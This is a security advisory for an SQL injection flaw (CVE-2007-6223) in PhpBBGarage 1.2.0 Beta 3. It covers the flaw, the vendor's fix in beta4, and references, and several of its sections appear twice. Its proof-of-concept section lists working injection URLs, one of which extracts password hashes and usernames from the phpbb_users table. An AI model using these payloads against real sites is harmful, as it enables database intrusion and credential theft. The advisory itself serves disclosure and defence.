PhpBBGarage Garage.PHP SQL Injection Vulnerability
BID:26683
Info
PhpBBGarage Garage.PHP SQL Injection Vulnerability
| Bugtraq ID: | 26683 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6223 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 03 2007 12:00AM |
| Updated: | Mar 13 2008 02:51PM |
| Credit: | maku234 is credited with the discovery of this vulnerability. |
| Vulnerable: |
PhpBBGarage PhpBBGarage 1.2.0 Beta 3 |
| Not Vulnerable: | |
Discussion
PhpBBGarage Garage.PHP SQL Injection Vulnerability
PhpBBGarage is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects PhpBBGarage 1.2.0 Beta 3; other versions may also be affected.
PhpBBGarage is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects PhpBBGarage 1.2.0 Beta 3; other versions may also be affected.
Exploit / POC
PhpBBGarage Garage.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following URIs are available:
http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*
Attackers can use a browser to exploit this issue.
The following URIs are available:
http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*
Solution / Fix
PhpBBGarage Garage.PHP SQL Injection Vulnerability
Solution:
The vendor released version 1.2.0 beta4 to address this issue. Please see the references for further information.
PhpBBGarage PhpBBGarage 1.2.0 Beta 3
Solution:
The vendor released version 1.2.0 beta4 to address this issue. Please see the references for further information.
PhpBBGarage PhpBBGarage 1.2.0 Beta 3
-
PhpBBGarage 1.2.0 Beta4
http://forums.phpbbgarage.com/dload.php?action=license&license_id=3&fi le_id=52
References
PhpBBGarage Garage.PHP SQL Injection Vulnerability
References:
References:
- phpBB Homepage (phpBB Group)
- PhpBBGarage Homepage (phpBBGarage.com)
- v1.2.0 Beta4 Released (phpBBGarrage.com)